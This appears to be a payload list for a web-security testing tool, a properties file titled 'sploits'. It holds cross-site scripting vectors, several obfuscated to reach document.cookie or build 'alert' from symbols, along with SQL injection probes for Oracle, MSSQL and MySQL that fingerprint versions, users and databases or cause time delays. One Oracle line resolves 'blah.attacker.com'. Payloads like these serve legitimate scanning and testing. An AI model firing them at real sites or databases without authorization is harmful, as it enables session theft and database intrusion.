title=sploits
locator='';!--"<XSS>=&{()}
xss_basic_1=<script>alert(123);</script>
xss_basic_2=<script>alert("XSS");</script>
xss_basic_3=<script>alert(/XSS/);</script>
xss_img_1=<img src=a onerror=alert(123); />
xss_img_2=<img src=a onerror=alert("XSS"); />
xss_img_3=<img src=a onerror=alert(/XSS/); />
xss_img_4=<img SRC="javascript:alert('XSS');">
xss_img_grave=<IMG SRC=`javascript:alert("'XSS'")`>
xss_anchor_1=<a onmouseover=alert(document.cookie)>xxs link</a>
xss_malformed_script=<<SCRIPT>alert("XSS");//<</SCRIPT>
xss_malformed_body=<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
xss_halfOpen=<IMG SRC="javascript:alert('XSS')"
xss_js_1=\";alert('XSS');//
xss_js_2=\";alert(/XSS/);//
xss_js_3=this["alert"]("xss")
xss_js_4=window["alert"]("xss")
partial_nonAlpha_alertOne=window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))
partial_nonAlpha_alertOneTwoThree=window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](123)
partial_charCode=String.fromCharCode(88,83,83)
partial_cookie_0=document["cookie"]
partial_cookie_1=document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65']
partial_cookie_2=document["\x63\x6f\x6f\x6b\x69\x65"]
partial_cookie_3=document[({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'kie']
xss_doubleByte_1=%u003cscript%u003ealert(123);%u003c/script%u003e
xss_doubleByte_2=%uff1cscript%uFF1ealert(123);%uff1c/script%uff1e
sql_oracle_version_1=SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’
sql_oracle_version_2=SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’
sql_oracle_version_3=SELECT version FROM v$instance
sql_oracle_user=SELECT user FROM dual
sql_oracle_currentDB=SELECT SYS.DATABASE_NAME FROM DUAL
sql_oracle_case=SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual
sql_oracle_delay_1=SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual
sql_oracle_delay_2=SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual
sql_MSsql_version=SELECT @@version
sql_MSsql_user_1=SELECT user_name()
sql_MSsql_user_2=SELECT system_user
sql_MSsql_user_3=SELECT user
sql_MSsql_user_4=SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
sql_MSsql_cast=SELECT CAST(’1′ as int)
sql_MSsql_case=SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END
sql_MSsql_currentDB=SELECT DB_NAME()
sql_MSsql_delay=WAITFOR DELAY ’0:0:5′
sql_mysql_version=SELECT @@version
sql_mysql_user_1=SELECT user()
sql_mysql_user_2=SELECT system_user()
sql_mysql_currentDB=SELECT database()
sql_mysql_cast=SELECT cast(’1′ AS unsigned integer)
sql_mysql_case=SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END
sql_mysql_delay_1=SELECT BENCHMARK(1000000,MD5(‘A’));
sql_mysql_delay_2=SELECT SLEEP(5)




